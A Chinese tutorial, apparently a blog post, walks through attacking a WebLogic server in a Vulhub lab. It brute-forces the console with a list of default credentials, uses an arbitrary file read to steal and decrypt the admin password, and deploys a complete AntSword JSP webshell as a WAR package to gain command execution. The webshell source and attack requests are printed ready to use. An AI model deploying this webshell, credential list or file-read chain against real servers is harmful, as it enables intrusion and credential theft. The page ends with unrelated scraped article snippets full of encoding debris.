Weblogic - General - 弱口令 任意文件读取漏洞

0x01:漏洞简介

首先需要说明,本文并不是介绍了 Weblogic 某一 CVE 漏洞,而是提供了一种通用的测试思路。

0x0101:弱口令漏洞

弱口令漏洞主要是由于用户安全意识淡薄,为了便于记忆,设置了强度过低的密码,甚至直接使用系统默认密码。这使得攻击者能够轻易地猜测或破解密码,从而引发安全问题。以下是一些常见的 Weblogic 弱口令:

 system:password
 weblogic:weblogic
 admin:secruity
 joe:password
 mary:password
 system:sercurity
 wlcsystem:wlcsystem
 weblogic:Oracle@123

0x0102:任意文件读取漏洞

任意文件读取漏洞,顾名思义,就是攻击者可以通过一个漏洞读取你服务器上的任意文件信息。

本章我们讲解的 “任意文件读取” 漏洞,并不是 Weblogic 自身的,而是假设其站点应用中存在这么一个漏洞(可以理解为你发现了一个 “任意文件读取” 漏洞,恰巧,这个站点又有一个 Weblogic 应用)我们的利用方法。

除了常见的尝试去包含 /etc/passwd,这种敏感信息外,针对 Weblogic 我们还可以尝试去读取 Weblogic 存储的密钥和密码密文后再使用工具通过 AES 解密出后台明文密码完成登录。

0x02:环境搭建

环境准备

  • VulHub CSDN配套资源:vulhub-master.zip

  • 靶机环境:CentOS 7 - IP 192.168.0.137 - 安装 VulHub

  • 攻击机环境:Windows 10(安装了常用的安全工具)- IP 192.168.0.1

0x0201:靶机环境搭建

靶机:CentOS 7 服务器配置概览

  • Docker & Docker 管理工具:Docker & Docker-Compose - 用来管理 Vulhub 靶场。

  • Git:用来从 GitHub 下载 Vulhub 靶场。

这里我们采用 Vulhub 来进行漏洞的复现,而 Vulhub 需要依靠 docker 来进行管理,对于 CentOS 7 安装 Docker 可以参考下面这篇文章的前两个部分(Docker & Docker-Compose 的安装):

ARL 灯塔 | CentOS7 — ARL 灯塔搭建流程(Docker)_灯塔arl-CSDN博客文章浏览阅读3.3k次,点赞59次,收藏23次。灯塔,全称:ARL 资产侦察灯塔系统,有着域名资产发现和整理、IP/IP 段资产整理、端口扫描和服务识别、WEB 站点指纹识别、资产分组管理和搜索等等功能块。_灯塔arlhttps://blog.csdn.net/m0_73360524/article/details/143098904https://blog.csdn.net/m0_73360524/article/details/143098904

下面我们主要介绍 CentOS 7 如何通过 Git 来安装 Vulhub 靶场,并通过 Docker 来对靶场进行管理和使用。

1. CentOS 7 安装 Git

首先,输入下面的命令安装 Git:

 sudo yum install -y git

然后输入下面的命令校验 Git 是否安装成功:

 git --version

2. Git 下载 Vulhub 靶场源码

https://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhubhttps://github.com/vulhub/vulhub

输入下面的命令在 /usr/local 文件夹下创建一个 soft 文件夹用以存放安装的软件:

 mkdir /usr/local/soft   # 创建 soft 文件夹
 cd /usr/local/soft      # 进入 soft 文件夹

然后进入 soft 文件夹,输入下面的命令,克隆 Vulhub 项目到本地:

 git clone https://github.com/vulhub/vulhub.git

(可选)如果你无法直接访问到 GitHub,可以通过前面的 “环境准备” 部分直接下载笔者下载好的 VulHub 资源然后上传到服务器中进行安装(笔者也是这样操作的):

 unzip vulhub-master.zip # 解压操作(可选),直接通过 Git 下载的应该不需要解压吧

通过上面两种方式安装完成后,结果应该长这样:

3. 通过 Docker 启动靶场环境

本次演示的是 Weblogic 的 “弱口令 & 任意文件读取” 漏洞。首先来到 VulHub 的安装路径:

cd /usr/local/soft/vulhub-master # 这是我本机安装的目录,可能与你的不一样哦

然后进入漏洞文件夹:

cd weblogic/weak_password/

接下来的命令都要在靶场根目录下执行,也就是有 docker-compose.yml 文件的这个目录(docker-compose 需要通过读取这个文件来快速配置靶场,如果执行命令的地方没有这个文件,docker-compose 是不起作用的哦)。

输入下面的命令直接启动容器(第一次启动它会拉取镜像,会比较慢,然后有部分小伙伴在拉取镜像的时候会报错,这是因为其默认的镜像源在国外,国内访问不到,换个 Docker 镜像源就行):

docker-compose up -d # -d 代表后台启动,如果去掉就是前台启动了

然后输入下面命令,查看 Docker 开启的虚拟环境的端口:

docker ps

接下来直接访问靶机的 7001 端口就可以访问漏洞环境啦:

http://192.168.0.137:7001/console

问题解决:物理机无法访问靶机内部的靶场地址。

问题描述: 通过靶机中的 Docker 启动的虚拟环境,靶机可以访问,但是物理机无法访问。 问题解决:

输入下面的命令,修改 selinux/config 文件中的内容:

vim /etc/selinux/config

关机重启虚拟机后回到我们的靶场目录下,输入下面的命令查看容器 ID:

docker ps -a

然后输入下面的命令,重新启动虚拟环境即可(不同机器的容器 ID 是不一样的):

docker start <容器ID> # 比如上面我的 ID 是 ab84,那我运行的就是 docker start ab84

等待靶机部署完毕后,就会自动跳到 Weblogic 的后台页面啦:

至此,靶机的环境我们已经配置完毕。

4. (附录)Docker 常用命令

以下是一些经常使用的 docker-compose 命令(需要在有 docker-compose.yml 的文件夹下使用):

docker-compose build # 拉取镜像,创建容器
docker-compose up -d # 启动容器,如果没有容器会自动拉取镜像,创建容器
docker-compose stop  # 停止容器(靶场),容器依旧存在可以通过 docker start <容器ID> 重启启动容器
docker-compose down  # 删除容器(靶场)

以下是一些 docker 常用的命令:

docker version # 查看本机 docker 版本
docker info    # 查看 docker 详细信息
docker ps -a   # 列出所有 docker 容器,包括暂停运行的,可查看容器 ID
docker start <容器 ID> # 启动容器
docker stop  <容器 ID> # 暂停容器
docker exec -it <容器 ID> /bin/bash # 进入容器 Bash
    exit       # 退出容器 Bash 
docker rm <容器 ID>    # 删除容器
docker image rm <镜像 ID> # 删除镜像

0x0202:攻击机环境搭建

攻击机没有什么特殊的环境搭建,安装了 BurpSuite 和 “中国蚁剑” 就可以了。

0x03:漏洞复现

0x0301:漏洞复现 - 弱口令漏洞

弱口令漏洞比较好复现,首先使用 BurpSuite 自带的浏览器访问靶机上的 Weblogic 后台地址:

http://192.168.0.137:7001/console/login/LoginForm.jsp

然后随意输入一个用户名与密码,点击登录后查看抓包情况:

如上,可以看到,提交的账号密码都是明文形式展示的。将这个包发送到 Intruder 模块,然后设置爆破的位置为 j_usernamej_password,设置攻击模式为 Pitchfork:

然后 Payload 使用漏洞简介中提供的 Weblogic 常见弱口令即可(你也可以自己收集字典来进行爆破,如果你这里不知道怎么设置 Payload,建议还是先学好 BurpSuite 后再来看本文),然后点击 Start Attack 开始攻击:

如上,成功爆破出了后台的账号密码,我们使用 weblogic : Oracle@123 来进行登录看看:

如上,成功进入 Weblogic 后台管理页面。至此,Weblogic 弱口令漏洞利用演示结束(也还没结束,还没拿到目标靶机的控制权呢,继续往后看)。

0x0302:漏洞复现 - 任意文件读取漏洞

在前面的弱口令漏洞中,假设你手头的字典都不管用,但是你发现了目标靶机的一个任意文件读取漏洞,那么你该如何利用该漏洞进行进一步的攻击呢?

那么,假设,你做目录扫描,刚好扫描出来了下面这个目录存在一个任意文件读取漏洞,你还尝试包含了目标的 /etc/passwd

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/etc/passwd
# view-source =>  查看网页源码(这里可以预览你下载的文件)

如上,我们成功拿到了 /etc/passwd 中的信息,接下来你当然可以去继续拿靶机的 /etc/shadow 中的密码内容,然后进行一个离线爆破,爆破出来后再直接使用账号密码进行登录。但爆破这玩意,说不准,人家给你设置个十几二十位的密码,你爆破到猴年马月才能进。

所以,这里我们选择另一种方法,我们尝试包含 Weblogic 的账号信息:

========================== Weblogic 密文(二进制)存放位置
绝对位置:/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
相对位置:security/SerializedSystemIni.dat
========================== Weblogic 密钥存放位置
绝对位置:/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
相对位置:config/config.xml

首先是包含 Weblogic 的密文信息,由于是二进制的,所以直接看不太好看,这里我们使用 BP:

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

首先选中前面框选部分的内容,然后右击,选择 “copy to file” 选项,设置保存的文件名为 xx.dat 即可:

接下来我们来尝试读取密钥文件,访问下面的地址,然后查看抓包信息:

view-source:http://192.168.0.137:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

如上,通过定位 node-manager-username 节点,成功拿到管理员账号和加密密钥:

账号: weblogic
密钥: {AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=

拿到了账号信息,接下来就是解密了,解密工具可以使用下面这款 GitHub 开源的工具(文章中还详细介绍了 Weblogic 的解密方法,非常建议详细阅读):

https://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Password

这里笔者使用的是 “一剑” 大佬写的 weblogic 图形化解密脚本,文件选择的就是我们上面保存的 dat 文件,密钥就是之前获取到的 AES 加密内容:

如上,成功拿到管理员的明文密码 Oracle@123。我们使用 weblogic : Oracle@123 来登录后台:

至此,通过任意文件读取漏洞获取 Weblogic 明文密码登录后台的演示结束(下面就是拿控制权了)。

0x0303:漏洞利用 - Weblogic 后台入侵

通过前面两节,我们已经成功以管理员的身份登录了 Weblogic 的后台了,Weblogic 与 Tomcat 等中间件一样,可以在上面部署应用。利用该特性,我们就可以部署一个后门应用,然后使用工具对其进行连接就能拿到 Shell 了。

首先,创建一个 shell.jsp 文件,文件内容如下,这是一个 AntSword 的 jsp Shell 文件,密码是 passwd:

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

保存该文件后,右击该文件,将该文件打包成 ZIP 文件,然后手动修改后缀为 .war:

然后登录目标的 Weblogic 后台(账号密码之前俺们就拿到了),点击左侧的 “部署”,然后点击 “安装”:

然后点击 “上载文件”,将我们的 shell.war 包上传上去,基本都是无脑下一步:

通过以上操作,我们就可以将后门文件部署上去了,部署了就要访问呀,那么路径怎么判断呢?

很多教程都是叫直接访问 /shell 就行,我们看看,直接访问 /shell 会显示 403 Forbidden:

http://192.168.0.137:7001/shell/

我们分析一下我们制作 war 包的过程,其实就是 jsp 压缩成 zip 后改个名称。那它直接部署 war 包,相当于我们的目录结构长下面这个样子:

/shell.war
    -- shell.jsp

然后 shell.war 作为压缩包,被 weblogic 识别成了文件夹。而我们关键的后门代码在 shell.jsp 中,所以要想拿到 Shell,我们就要直接访问 war 包内部的 shell.jsp,所以真实的路径应该是:

http://192.168.0.137:7001/shell/shell.jsp

没有报错,就证明这个项目存在,就是最好的回应。然后这个 Shell,是 “中国蚁剑” 的 shell,我们拿中国蚁剑连接一下看看,密码是 passwd:

如上,连接成功。我们使用虚拟终端执行个命令看看:

如上,成功拿到了虚拟环境的控制权。从目标回显的 ip 地址 172 可以看出,这其实相对于我物理机来说是一个内网的 IP。那么至此,weblogic 后台入侵演示完毕。

0x04:参考资料

https://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Passwordhttps://github.com/TideSec/Decrypt_Weblogic_Password

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/956566.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

C#中的语句

C#提供了各式各样的语句&#xff0c;大多数是由C和C发展而来&#xff0c;当然&#xff0c;在C#中做了相应修改。语句和表达式一样&#xff0c;都是C#程序的基本组成部分&#xff0c;在本文我们来一起学习C#语句。 1.语句 语句是构造所有C#程序的过程构造块。在语句中可以声明…

VLAN基础理论

VLAN V&#xff1a;Virtual(虚拟) LAN ——局域网 VLAN ——虚拟局域网(虚拟广播域&#xff1a;交换机和路由器协同工作后&#xff0c;将原来的一个广播域&#xff0c;逻辑上切分为多个。) VLAN的配置我们基于以下拓扑进行&#xff1a; PC1-4的IP地址依次为192.168.1.1-192.168…

基于SpringBoot的健身房管理系统【源码+文档+部署讲解】

系统介绍 基于SpringBootVue实现的健身房管理系统采用前后端分离架构方式&#xff0c;系统设计了管理员、会员、员工三种角色&#xff0c;系统实现了用户登录与注册、个人中心、会员管理、员工管理、会员卡管理、会员卡类型管理、教练信息管理、解聘管理、健身项目管理、指导项…

C++ 模拟真人鼠标轨迹算法 - 防止游戏检测

一.简介 鼠标轨迹算法是一种模拟人类鼠标操作的程序&#xff0c;它能够模拟出自然而真实的鼠标移动路径。 鼠标轨迹算法的底层实现采用C/C语言&#xff0c;原因在于C/C提供了高性能的执行能力和直接访问操作系统底层资源的能力。 鼠标轨迹算法具有以下优势&#xff1a; 模拟…

搭建一个基于Spring Boot的校园台球厅人员与设备管理系统

搭建一个基于Spring Boot的校园台球厅人员与设备管理系统可以涵盖多个功能模块&#xff0c;例如用户管理、设备管理、预约管理、计费管理等。以下是一个简化的步骤指南&#xff0c;帮助你快速搭建一个基础的系统。 — 1. 项目初始化 使用 Spring Initializr 生成一个Spring …

Langchain+FastApi+Vue前后端Ai对话(超详细)

一、引入 首先可以先看下作者的文章 FastApi相关文章&#xff1a;创建最简单FastApi的项目Vue相关文章&#xff1a;最简单的aixos二次封装Langchain相关文章&#xff1a;如何使用LangSmith跟踪deepseek模型 二、后端搭建 1 项目文件结构 routers&#xff1a;存放api接口se…

图像去雾数据集的下载和预处理操作

前言 目前&#xff0c;因为要做对比实验&#xff0c;收集了一下去雾数据集&#xff0c;并且建立了一个数据集的预处理工程。 这是以前我写的一个小仓库&#xff0c;我决定还是把它用起来&#xff0c;下面将展示下载的路径和数据处理的方法。 下面的代码均可以在此找到。Auo…

Java中json的一点理解

一、Java中json字符串与json对象 1、json本质 json是一种数据交换格式。 常说的json格式的字符串 > 发送和接收时都只是一个字符串&#xff0c;它遵循json这种格式。 2、前后端交互传输的json是什么&#xff1f; 前后端交互传输的json都是json字符串 比如&#xff1a;…

React实现拖拽特效

前言 最近&#xff0c;我看到一个工程师的个人网站上&#xff0c;采用了拖拽作品集的互动特效&#xff0c;既有趣又吸引眼球。经过一些研究&#xff0c;我发现其实借助一些现成的套件&#xff0c;就能轻松实现这样的效果。今天就带大家一起看看&#xff0c;如何通过 Framer Mo…

leetcode904-水果成篮

leetcode 904 时间复杂度&#xff1a;O(n) 空间复杂度&#xff1a;O(1) 之前发布了一个滑动窗口的题目解答思路&#xff0c;参考博文&#xff1a;长度最小的子数组 本题也是基于滑动窗口的一个扩展题&#xff0c;主要解决方法是利用滑动窗口哈希表 var totalFruit function…

线性代数概述

矩阵与线性代数的关系 矩阵是线性代数的研究对象之一&#xff1a; 矩阵&#xff08;Matrix&#xff09;是一个按照长方阵列排列的复数或实数集合&#xff0c;是线性代数中的核心概念之一。矩阵的定义和性质构成了线性代数中矩阵理论的基础&#xff0c;而矩阵运算则简洁地表示和…

李宏毅机器学习HW1: COVID-19 Cases Prediction

Kaggle数据集和提交链接 特征选择&#xff08;主要修改地方&#xff09; 在sample code的基础上主要修改了Select_feat选择特征函数。 首先&#xff0c;因为数据集中的第一列是id&#xff0c;先在raw_x_train&#xff0c;raw_x_valid&#xff0c;raw_x_test中都去掉这一列。其…

owasp SQL 注入-03 (原理)

1: 先看一下注入界面: 点submit 后&#xff0c;可以看到有语法报错&#xff0c;说明已经起作用了: 报如下的错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 2:…

VD:生成a2l文件

目录 前言Simulink合并地址 ASAP2 editor 前言 我之前的方法都是通过Simulink模型生成代码的过程中顺便就把a2l文件生成出来了&#xff0c;这时的a2l文件还没有地址&#xff0c;所以紧接着会去通过elf文件更新地址&#xff0c;一直以为这是固定的流程和方法&#xff0c;今天无…

Navicat Premium 数据可视化

工作区&#xff0c;数据源以及图表 数据可视化是使用可视化组件&#xff08;例如图表&#xff0c;图形和地图&#xff09;的信息和数据的图形表示。 数据可视化工具提供了一种可访问的方式&#xff0c;用于查看和理解数据中的趋势&#xff0c;异常值和其他模式。 在Navicat中&…

设置 Git 默认推送不需要输入账号和密码【Ubuntu、SSH】

如何设置 Git 默认推送不需要输入账号和密码 在使用 Git 管理代码时&#xff0c;许多开发者会遇到每次推送&#xff08;push&#xff09;或拉取&#xff08;fetch&#xff09;代码时都需要输入 GitHub 或 GitLab 等远程仓库的账号和密码的情况。虽然设置了用户名和电子邮件信息…

TCP Window Full是怎么来的

wireshark查看包时&#xff0c;会看到TCP Window Full&#xff0c;总结下它的特点&#xff1a; 1. Sender会显示 TCP Window Full 2. “Sender已发出&#xff0c;但&#xff0c;Receiver尚未ack的字节”&#xff0c;即Sender的 bytes in flights 3. Sender的 bytes in fligh…

PyTorch框架——基于WebUI:Gradio深度学习ShuffleNetv2神经网络蔬菜图像识别分类系统

第一步&#xff1a;准备数据 蔬菜数据集&#xff0c;英文为Vegetable。 train 目录下有15000 张图片。 共十五种植物的幼苗图片集&#xff0c;分别为classes [Bean, Bitter_Gourd, Bottle_Gourd, Brinjal, Broccoli, Cabbage, Capsicum, Carrot, Cauliflower, Cucumber, Pa…

WPS数据分析000001

目录 一、表格的新建、保存、协作和分享 新建 保存 协作 二、认识WPS表格界面 三、认识WPS表格选项卡 开始选项卡 插入选项卡 页面布局选项卡 公式选项卡 数据选项卡 审阅选项卡 视图选项卡 会员专享选项卡 一、表格的新建、保存、协作和分享 新建 ctrlN------…

网络安全 | 什么是正向代理和反向代理?

关注&#xff1a;CodingTechWork 引言 在现代网络架构中&#xff0c;代理服务器扮演着重要的角色。它们在客户端和服务器之间充当中介&#xff0c;帮助管理、保护和优化数据流。根据代理的工作方向和用途&#xff0c;代理服务器可分为正向代理和反向代理。本文将深入探讨这两种…